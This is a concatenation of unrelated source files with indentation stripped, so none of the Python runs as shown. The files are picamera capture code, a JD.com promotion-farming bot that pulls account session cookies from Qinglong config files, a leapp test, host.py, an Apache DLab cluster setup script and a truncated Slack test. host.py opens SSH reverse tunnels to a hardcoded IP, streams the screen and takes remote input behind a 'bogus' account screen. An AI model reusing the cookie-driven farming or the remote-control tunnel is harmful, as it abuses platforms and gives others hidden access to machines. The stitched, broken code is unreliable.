path = os.path.join(root, "image.jpg")
with picamera.PiCamera() as camera:
self._setup_camera(camera)
camera.capture(path)
while 1:
camera.capture(path)
time.sleep(1 / float(self.frame_rate))
t = Thread(target=func)
t.setDaemon(True)
t.start()
def get_image_array(self):
with picamera.PiCamera() as camera:
self._setup_camera(camera)
with picamera.array.PiRGBArray(camera) as output:
camera.capture(output, "rgb")
return output.array
def capture(self, path=None, name=None, **options):
with picamera.PiCamera() as camera:
self._setup_camera(camera)
if path is None:
if name is None:
path, _ = unique_path2(paths.snapshot_dir, name, extension=".jpg")
else:
path, _ = unique_path2(paths.snapshot_dir, "rpi", extension=".jpg")
camera.capture(path, **options)
# private
def _setup_camera(self, camera):
attrs = (
"sharpness",
"contrast",
"brightness",
"saturation",
"ISO",
"video_stabilization",
"exposure_compensation",
"exposure_mode",
"meter_mode",
"awb_mode",
"image_effect",
"color_effects",
"rotation",
"hflip",
"vflip",
"crop",
)
for attr in attrs:
setattr(camera, attr, getattr(self, attr))
# ============= EOF =============================================
|
jd_15.py
|
#!/bin/env python3
# -*- coding: utf-8 -*
'''
cron: 0 59 23 * * 0 jd_15.py
new Env('Faker群友家电15周年助力');
'''
# cron
#不做浏览,只做助力 建议先运行jd_appliances.js 在运行此脚本
# export jd15_pins=["pt_pin1","pt_pin2"]
from urllib.parse import unquote, quote
import time, datetime, os, sys
import requests, json, re, random
import threading
UserAgent = ''
script_name = '家电15周年助力'
def printT(msg):
print("[{}]: {}".format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), msg))
sys.stdout.flush()
def delEnvs(label):
try:
if label == 'True' or label == 'yes' or label == 'true' or label == 'Yes':
return True
elif label == 'False' or label == 'no' or label == 'false' or label == 'No':
return False
except:
pass
try:
if '.' in label:
return float(label)
elif '&' in label:
return label.split('&')
elif '@' in label:
return label.split('@')
else:
return int(label)
except:
return label
class getJDCookie():
# 适配青龙平台环境ck
def getckfile(self):
ql_new = '/ql/config/env.sh'
ql_old = '/ql/config/cookie.sh'
if os.path.exists(ql_new):
printT("当前环境青龙面板新版")
return ql_new
elif os.path.exists(ql_old):
printT("当前环境青龙面板旧版")
return ql_old
# 获取cookie
def getallCookie(self):
cookies = ''
ckfile = self.getckfile()
try:
if os.path.exists(ckfile):
with open(ckfile, "r", encoding="utf-8") as f:
cks_text = f.read()
if 'pt_key=' in cks_text and 'pt_pin=' in cks_text:
r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
cks_list = r.findall(cks_text)
if len(cks_list) > 0:
for ck in cks_list:
cookies += ck
return cookies
except Exception as e:
printT(f"【getCookie Error】{e}")
# 检测cookie格式是否正确
def getUserInfo(self, ck, user_order, pinName):
url = 'https://me-api.jd.com/user_new/info/GetJDUserInfoUnion?orgFlag=JD_PinGou_New&callSource=mainorder&channel=4&isHomewhite=0&sceneval=2&sceneval=2&callback='
headers = {
'Cookie': ck,
'Accept': '*/*',
'Connection': 'close',
'Referer': 'https://home.m.jd.com/myJd/home.action',
'Accept-Encoding': 'gzip, deflate, br',
'Host': 'me-api.jd.com',
'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Mobile/15E148 Safari/604.1',
'Accept-Language': 'zh-cn'
}
try:
resp = requests.get(url=url, headers=headers, timeout=60).json()
if resp['retcode'] == "0":
nickname = resp['data']['userInfo']['baseInfo']['nickname']
return ck, nickname
else:
context = f"账号{user_order}【{pinName}】Cookie 已失效!请重新获取。"
print(context)
return ck, False
except Exception:
context = f"账号{user_order}【{pinName}】Cookie 已失效!请重新获取。"
print(context)
return ck, False
def getcookies(self):
"""
:return: cookiesList,userNameList,pinNameList
"""
cookiesList = []
pinNameList = []
nickNameList = []
cookies = self.getallCookie()
if 'pt_key=' in cookies and 'pt_pin=' in cookies:
r = re.compile(r"pt_key=.*?pt_pin=.*?;", re.M | re.S | re.I)
result = r.findall(cookies)
if len(result) >= 1:
printT("您已配置{}个账号".format(len(result)))
user_order = 1
for ck in result:
r = re.compile(r"pt_pin=(.*?);")
pinName = r.findall(ck)
pinName = unquote(pinName[0])
# 获取账号名
ck, nickname = self.getUserInfo(ck, user_order, pinName)
if nickname != False:
cookiesList.append(ck)
pinNameList.append(pinName)
nickNameList.append(nickname)
user_order += 1
else:
user_order += 1
continue
if len(cookiesList) > 0:
return cookiesList, pinNameList, nickNameList
else:
printT("没有可用Cookie,已退出")
exit(4)
else:
printT("没有可用Cookie,已退出")
exit(4)
def getPinEnvs():
if "jd15_pins" in os.environ:
if len(os.environ["jd15_pins"]) != 0:
jd15_pins = os.environ["jd15_pins"]
jd15_pins = jd15_pins.replace('[', '').replace(']', '').replace('\'', '').replace(' ', '').split(',')
printT(f"已获取并使用Env环境 jd15_pins:{jd15_pins}")
return jd15_pins
else:
printT('请先配置export jd15_pins=["pt_pin1","pt_pin2"]')
exit(4)
printT('请先配置export jd15_pins=["pt_pin1","pt_pin2"]')
exit(4)
def res_post(cookie, body):
url = "https://api.m.jd.com/api"
headers = {
"Host": "api.m.jd.com",
"content-length": "146",
"accept": "application/json, text/plain, */*",
"origin": "https://welfare.m.jd.com",
"user-agent": "jdapp;android;10.1.0;10;4636532323835366-1683336356836626;network/UNKNOWN;model/MI 8;addressid/4608453733;aid/dc52285fa836e8fb;oaid/a28cc4ac8bda0bf6;osVer/29;appBuild/89568;partner/xiaomi001;eufv/1;jdSupportDarkMode/0;Mozilla/5.0 (Linux; Android 10; MI 8 Build/QKQ1.190828.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/77.0.3865.120 MQQBrowser/6.2 TBS/045715 Mobile Safari/537.36",
"sec-fetch-mode": "cors",
"content-type": "application/x-www-form-urlencoded",
"x-requested-with": "com.jingdong.app.mall",
"sec-fetch-site": "same-site",
"referer": "https://welfare.m.jd.com/",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q\u003d0.9,en-US;q\u003d0.8,en;q\u003d0.7",
"cookie": cookie
}
body = json.dumps(body)
t = str(int(time.time() * 1000))
data = {
'appid': 'anniversary-celebra',
'functionId': 'jd_interaction_prod',
'body': body,
't': t,
'loginType': 2
}
res = requests.post(url=url, headers=headers, data=data).json()
return res
def get_share5(cookie):
body = {"type": "99", "apiMapping": "/api/supportTask/getShareId"}
res = res_post(cookie, body)
# print(res)
if '成功' in res['msg']:
return res['data']
def get_share50(cookie):
body = {"type": "100", "apiMapping": "/api/supportTask/getShareId"}
res = res_post(cookie, body)
# print(res)
if '成功' in res['msg']:
return res['data']
def getprize1(cookie,nickname):
body = {"apiMapping": "/api/prize/getCoupon"}
res = res_post(cookie, body)
# print(res)
if res['code'] == 200:
print('------【账号:' + nickname + '】------' + res['data']['name'])
else:
print('------【账号:' + nickname + '】------优惠券领过了')
def getprize2(cookie,nickname):
body = {"apiMapping": "/api/prize/doLottery"}
res = res_post(cookie, body)
# print(res)
if res['code'] == 5011:
print('------【账号:' + nickname + '】------未中奖e卡')
else:
print('------【账号:' + nickname + '】------不确定,手动确认')
def help(mycookie, nickname, cookiesList, nickNameList):
shareId5 = get_share5(mycookie)
if shareId5 != None:
# print('获取5助力码成功:', shareId5)
# print('--------------------------------------开始5个助力-------------')
body1 = {"shareId": shareId5, "apiMapping": "/api/supportTask/doSupport"}
for i in range(len(cookiesList)):
res = res_post(cookiesList[i], body1)
# print(res)
try:
if res['code'] == 200 and res['data']['status'] == 7:
print(nickNameList[i] + '助力' + nickname + ':' + '5助力成功')
elif res['code'] == 200 and res['data']['status'] == 4:
print(nickNameList[i]+'助力'+nickname+':'+'5个助力完成啦----')
getprize1(mycookie,nickname)
getprize2(mycookie,nickname)
break
elif res['code'] == 200 and res['data']['status'] == 3:
print(nickNameList[i]+'助力'+nickname+':'+'5已经助力过了')
except:
pass
else:
print('【账号:' + nickname + '】请先手动执行下浏览任务')
shareId50 = get_share50(mycookie)
if shareId50 != None:
# print('获取50助力码成功:', shareId50)
# print('-------------------------------开始50个助力-------------')
body2 = {"shareId": shareId50, "apiMapping": "/api/supportTask/doSupport"}
for ck in mycookie:
res = res_post(ck, body2)
# print(res)
try:
if res['code'] == 200 and res['data']['status'] == 7:
print(nickNameList[i] + '助力' + nickname + ':' + '50助力成功')
elif res['code'] == 200 and res['data']['status'] == 4:
print(nickNameList[i] + '助力' + nickname + ':' + '50个助力完成啦----')
getprize1(mycookie, nickname)
getprize2(mycookie, nickname)
break
elif res['code'] == 200 and res['data']['status'] == 3:
print(nickNameList[i] + '助力' + nickname + ':' + '50已经助力过了')
except:
pass
else:
print('【账号' + nickname + '】请先手动执行下浏览任务')
def use_thread(jd15_cookies, nicks, cookiesList, nickNameList):
threads = []
for i in range(len(jd15_cookies)):
threads.append(
threading.Thread(target=help, args=(jd15_cookies[i], nicks[i], cookiesList, nickNameList))
)
for t in threads:
t.start()
for t in threads:
t.join()
def start():
printT("############{}##########".format(script_name))
jd15_pins = getPinEnvs()
get_jd_cookie = getJDCookie()
cookiesList, pinNameList, nickNameList = get_jd_cookie.getcookies()
jd15_cookies = []
nicks = []
for ckname in jd15_pins:
try:
ckNum = pinNameList.index(ckname)
jd15_cookies.append(cookiesList[ckNum])
nicks.append(nickNameList[ckNum])
except Exception as e:
try:
ckNum = pinNameList.index(unquote(ckname))
jd15_cookies.append(cookiesList[ckNum])
nicks.append(nickNameList[ckNum])
except:
print(f"请检查被助力账号【{ckname}】名称是否正确?ck是否存在?提示:助力名字可填pt_pin的值、也可以填账号名。")
continue
if len(jd15_cookies) == 0:
exit(4)
use_thread(jd15_cookies, nicks, cookiesList, nickNameList)
if __name__ == '__main__':
start()
|
test_repository.py
|
from argparse import Namespace
from multiprocessing import Process
import pytest
from leapp.repository.scan import find_and_scan_repositories, scan_repo
from helpers import make_repository_dir
from leapp.snactor.commands.new_actor import cli as new_actor_cmd
from leapp.snactor.commands.new_tag import cli as new_tag_cmd
from leapp.snactor.commands.workflow.new import cli as new_workflow_cmd
from leapp.exceptions import LeappRuntimeError
repository_empty_test_repository_dir = make_repository_dir('empty_repository_dir', scope='module')
repository_test_repository_dir = make_repository_dir('repository_dir', scope='module')
def test_empty_repo(empty_repository_dir):
with empty_repository_dir.as_cwd():
repo = scan_repo(empty_repository_dir.strpath)
repo.load(resolve=True)
assert not repo.actors
assert not repo.files
assert not repo.models
assert not repo.tags
assert not repo.topics
assert not repo.workflows
assert not repo.lookup_workflow('Any')
assert not repo.lookup_actor('Any')
def setup_repo(repository_dir):
with repository_dir.as_cwd():
new_tag_cmd(Namespace(tag_name='Test'))
new_workflow_cmd(Namespace(name='Test', class_name=None, short_name=None))
actor_path = new_actor_cmd(Namespace(
actor_name='TestActor',
tag=['TestTag', 'TestWorkflowTag'],
consumes=[],
produces=[],
))
type(repository_dir)(actor_path).join('tests', 'test_this_actor.py').write('print("I am a test")')
type(repository_dir)(actor_path).mkdir('libraries').mkdir('lib').join('__init__.py').write(
'''from subprocess import call
# This is to ensure that actor tools are available on actor library load time
assert call(['woot-tool']) == 42
# This is to ensure that common tools are available on actor library load time
assert call(['common-woot-tool']) == 42
def do():
# This must always fail - This function is crashing the actor ;-)
assert call(['woot-tool']) == 0
''')
repository_dir.mkdir('libraries').mkdir('lib').join('__init__.py').write(
'''from subprocess import call
# This is to ensure that common tools are available on common library load time
assert call(['common-woot-tool']) == 42
''')
type(repository_dir)(actor_path).mkdir('files').join('test.data').write('data')
repository_dir.mkdir('files').join('common-test.data').write('data')
tool_path = type(repository_dir)(actor_path).mkdir('tools').join('woot-tool')
woot_tool_content = '''#!/bin/bash
echo 'WOOT'
exit 42
'''
tool_path.write(woot_tool_content)
tool_path.chmod(0o755)
tool_path = repository_dir.mkdir('tools').join('common-woot-tool')
tool_path.write(woot_tool_content)
tool_path.chmod(0o755)
actor_file = type(repository_dir)(actor_path).join('actor.py')
actor_content = actor_file.read().replace('pass', '''from leapp.libraries.actor.lib import do
import leapp.libraries.common.lib
do()''')
actor_file.write(actor_content)
def test_repo(repository_dir):
setup_repo(repository_dir)
def _run_test(repo_path):
with repo_path.as_cwd():
repository = find_and_scan_repositories(repo_path.dirpath().strpath)
assert repository
repository.load(resolve=True)
import leapp.tags
assert getattr(leapp.tags, 'TestTag')
assert repository.lookup_actor('TestActor')
assert repository.lookup_workflow('TestWorkflow')
assert not repository.lookup_workflow('MissingWorkflow')
assert not repository.lookup_actor('MissingActor')
assert repository.repos
assert len(repository.dump()) >= 1
assert repository.actors
assert not repository.topics
assert not repository.models
assert repository.tags
assert repository.workflows
assert repository.tools
assert repository.libraries
assert repository.files
with pytest.raises(LeappRuntimeError):
repository.lookup_actor('TestActor')().run()
p = Process(target=_run_test, args=(repository_dir,))
p.start()
p.join()
assert p.exitcode == 0
|
host.py
|
from threading import Thread
from input_manager import InputManager
from vnc import VNC
from port_forward import ssh_tunnel
from bogus import main_account_screen
import requests
import sys
PORTS_REQUEST = 'http://136.244.115.143:4000'
status = 'None'
connection = 'None'
vnc = VNC()
input_manager = InputManager()
def start_host():
# Start port 7000 remote port 4005
port_1 = 6969
port_2 = 7000
print('Hosting...')
try:
requests.get(PORTS_REQUEST)
print(requests.get(PORTS_REQUEST))
port_remote_1 = int(requests.get(PORTS_REQUEST).headers['port'])
port_remote_2 = port_remote_1 + 1
ssh1_thread = Thread(target=ssh_tunnel, args=[port_1, port_remote_1])
ssh1_thread.daemon = True
ssh1_thread.start()
print("SSH 1 thread started")
ssh2_thread = Thread(target=ssh_tunnel, args=[port_2, port_remote_2])
ssh2_thread.daemon = True
ssh2_thread.start()
print("SSH 2 thread started")
transmit_thread = Thread(target=vnc.transmit)
transmit_thread.daemon = True
transmit_thread.start()
print("Transmit thread started")
input_thread = Thread(target=input_manager.receive_input, args=[])
input_thread.daemon = True
input_thread.start()
print("Input thread started")
transmit_thread.join()
input_thread.join()
print("Both threads joined")
except Exception as e:
print(e)
print("Nothing")
if 'only-interface' in sys.argv:
main_account_screen(True)
elif 'on-demand' in sys.argv:
start_host()
else:
main_account_screen()
start_host()
|
dataengine_configure.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
import sys
import os
import uuid
import logging
from Crypto.PublicKey import RSA
import multiprocessing
def configure_slave(slave_number, data_engine):
slave_name = data_engine['slave_node_name'] + '{}'.format(slave_number + 1)
slave_hostname = GCPMeta().get_private_ip_address(slave_name)
try:
logging.info('[CREATING DLAB SSH USER ON SLAVE NODE]')
print('[CREATING DLAB SSH USER ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format \
(slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on slave.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON SLAVE NODE]')
logging.info('[INSTALLING USERs KEY ON SLAVE NODE]')
additional_config = {"user_keyname": os.environ['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
slave_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(
additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user key on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON SLAVE NODE]')
print('[CONFIGURE PROXY ON ON SLAVE NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(slave_hostname, slave_name, keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on slave.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON SLAVE NODE]')
print('[INSTALLING PREREQUISITES ON SLAVE NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}". \
format(slave_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on slave.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE SLAVE NODE {}]'.format(slave + 1))
print('[CONFIGURE SLAVE NODE {}]'.format(slave + 1))
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}". \
format(slave_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'slave')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed configuring slave node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure slave node.", str(err))
sys.exit(1)
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
try:
print('Generating infrastructure names and tags')
data_engine = dict()
data_engine['service_base_name'] = (os.environ['conf_service_base_name']).lower().replace('_', '-')
data_engine['edge_user_name'] = (os.environ['edge_user_name']).lower().replace('_', '-')
data_engine['project_name'] = (os.environ['project_name']).lower().replace('_', '-')
data_engine['endpoint_tag'] = os.environ['endpoint_name'].lower().replace('_', '-')
data_engine['region'] = os.environ['gcp_region']
data_engine['zone'] = os.environ['gcp_zone']
try:
if os.environ['gcp_vpc_name'] == '':
raise KeyError
else:
data_engine['vpc_name'] = os.environ['gcp_vpc_name']
except KeyError:
data_engine['vpc_name'] = '{}-ssn-vpc'.format(data_engine['service_base_name'])
try:
data_engine['exploratory_name'] = (os.environ['exploratory_name']).lower().replace('_', '-')
except:
data_engine['exploratory_name'] = ''
try:
data_engine['computational_name'] = os.environ['computational_name'].lower().replace('_', '-')
except:
data_engine['computational_name'] = ''
data_engine['subnet_name'] = '{0}-{1}-subnet'.format(data_engine['service_base_name'],
data_engine['project_name'])
data_engine['master_size'] = os.environ['gcp_dataengine_master_size']
data_engine['slave_size'] = os.environ['gcp_dataengine_slave_size']
data_engine['key_name'] = os.environ['conf_key_name']
data_engine['ssh_key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], data_engine['key_name'])
data_engine['dataengine_service_account_name'] = '{}-{}-ps'.format(data_engine['service_base_name'],
data_engine['project_name'])
if os.environ['conf_os_family'] == 'debian':
initial_user = 'ubuntu'
sudo_group = 'sudo'
if os.environ['conf_os_family'] == 'redhat':
initial_user = 'ec2-user'
sudo_group = 'wheel'
data_engine['cluster_name'] = data_engine['service_base_name'] + '-' + data_engine['project_name'] + \
'-de-' + data_engine['exploratory_name'] + '-' + \
data_engine['computational_name']
data_engine['master_node_name'] = data_engine['cluster_name'] + '-m'
data_engine['slave_node_name'] = data_engine['cluster_name'] + '-s'
data_engine['instance_count'] = int(os.environ['dataengine_instance_count'])
data_engine['notebook_name'] = os.environ['notebook_instance_name']
data_engine['gpu_accelerator_type'] = 'None'
if os.environ['application'] in ('tensor', 'deeplearning'):
data_engine['gpu_accelerator_type'] = os.environ['gcp_gpu_accelerator_type']
data_engine['network_tag'] = '{0}-{1}-ps'.format(data_engine['service_base_name'],
data_engine['project_name'])
master_node_hostname = GCPMeta().get_private_ip_address(data_engine['master_node_name'])
edge_instance_name = '{0}-{1}-{2}-edge'.format(data_engine['service_base_name'],
data_engine['project_name'], data_engine['endpoint_tag'])
edge_instance_hostname = GCPMeta().get_instance_public_ip_by_name(edge_instance_name)
edge_instance_private_ip = GCPMeta().get_private_ip_address(edge_instance_name)
data_engine['dlab_ssh_user'] = os.environ['conf_os_user']
keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
print("Failed to generate variables dictionary.")
append_result("Failed to generate variables dictionary.", str(err))
sys.exit(1)
try:
logging.info('[CREATING DLAB SSH USER ON MASTER NODE]')
print('[CREATING DLAB SSH USER ON MASTER NODE]')
params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\
(master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", initial_user,
data_engine['dlab_ssh_user'], sudo_group)
try:
local("~/scripts/{}.py {}".format('create_ssh_user', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to create ssh user on master.", str(err))
sys.exit(1)
try:
print('[INSTALLING USERs KEY ON MASTER NODE]')
logging.info('[INSTALLING USERs KEY ON MASTER NODE]')
additional_config = {"user_keyname": os.environ['project_name'],
"user_keydir": os.environ['conf_key_dir']}
params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format(
master_node_hostname, os.environ['conf_key_dir'] + data_engine['key_name'] + ".pem", json.dumps(additional_config), data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('install_user_key', params))
except:
append_result("Failed installing users key")
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install ssh user on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE PROXY ON MASTER NODE]')
print('[CONFIGURE PROXY ON ON MASTER NODE]')
additional_config = {"proxy_host": edge_instance_name, "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(master_node_hostname, data_engine['master_node_name'], keyfile_name, json.dumps(additional_config),
data_engine['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to configure proxy on master.", str(err))
sys.exit(1)
try:
logging.info('[INSTALLING PREREQUISITES ON MASTER NODE]')
print('[INSTALLING PREREQUISITES ON MASTER NODE]')
params = "--hostname {} --keyfile {} --user {} --region {} --edge_private_ip {}".\
format(master_node_hostname, keyfile_name, data_engine['dlab_ssh_user'], data_engine['region'],
edge_instance_private_ip)
try:
local("~/scripts/{}.py {}".format('install_prerequisites', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed installing apps: apt & pip.", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
append_result("Failed to install prerequisites on master.", str(err))
sys.exit(1)
try:
logging.info('[CONFIGURE MASTER NODE]')
print('[CONFIGURE MASTER NODE]')
params = "--hostname {} --keyfile {} --region {} --spark_version {} --hadoop_version {} --os_user {} " \
"--scala_version {} --r_mirror {} --master_ip {} --node_type {}".\
format(master_node_hostname, keyfile_name, data_engine['region'], os.environ['notebook_spark_version'],
os.environ['notebook_hadoop_version'], data_engine['dlab_ssh_user'],
os.environ['notebook_scala_version'], os.environ['notebook_r_mirror'], master_node_hostname,
'master')
try:
local("~/scripts/{}.py {}".format('configure_dataengine', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to configure master node", str(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
jobs = []
for slave in range(data_engine['instance_count'] - 1):
p = multiprocessing.Process(target=configure_slave, args=(slave, data_engine))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i+1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
notebook_instance_ip = GCPMeta().get_private_ip_address(data_engine['notebook_name'])
additional_info = {
"computational_name": data_engine['computational_name'],
"master_node_hostname": master_node_hostname,
"notebook_instance_ip": notebook_instance_ip,
"instance_count": data_engine['instance_count'],
"master_node_name": data_engine['master_node_name'],
"slave_node_name": data_engine['slave_node_name'],
"tensor": False
}
params = "--edge_hostname {} " \
"--keyfile {} " \
"--os_user {} " \
"--type {} " \
"--exploratory_name {} " \
"--additional_info '{}'"\
.format(edge_instance_hostname,
keyfile_name,
data_engine['dlab_ssh_user'],
'spark',
data_engine['exploratory_name'],
json.dumps(additional_info))
try:
local("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params))
except:
append_result("Failed edge reverse proxy template")
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
for i in range(data_engine['instance_count'] - 1):
slave_name = data_engine['slave_node_name'] + '{}'.format(i + 1)
GCPActions().remove_instance(slave_name, data_engine['zone'])
GCPActions().remove_instance(data_engine['master_node_name'], data_engine['zone'])
sys.exit(1)
try:
ip_address = GCPMeta().get_private_ip_address(data_engine['master_node_name'])
spark_master_url = "http://" + ip_address + ":8080"
spark_master_acces_url = "http://" + edge_instance_hostname + "/{}/".format(
data_engine['exploratory_name'] + '_' + data_engine['computational_name'])
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(data_engine['service_base_name']))
print("Region: {}".format(data_engine['region']))
print("Cluster name: {}".format(data_engine['cluster_name']))
print("Master node shape: {}".format(data_engine['master_size']))
print("Slave node shape: {}".format(data_engine['slave_size']))
print("Instance count: {}".format(str(data_engine['instance_count'])))
with open("/root/result.json", 'w') as result:
res = {"hostname": data_engine['cluster_name'],
"instance_id": data_engine['master_node_name'],
"key_name": data_engine['key_name'],
"Action": "Create new Data Engine",
"computational_url": [
{"description": "Apache Spark Master",
"url": spark_master_acces_url},
# {"description": "Apache Spark Master (via tunnel)",
# "url": spark_master_url}
]
}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(0)
|
test_issue_605.py
|
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import \
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
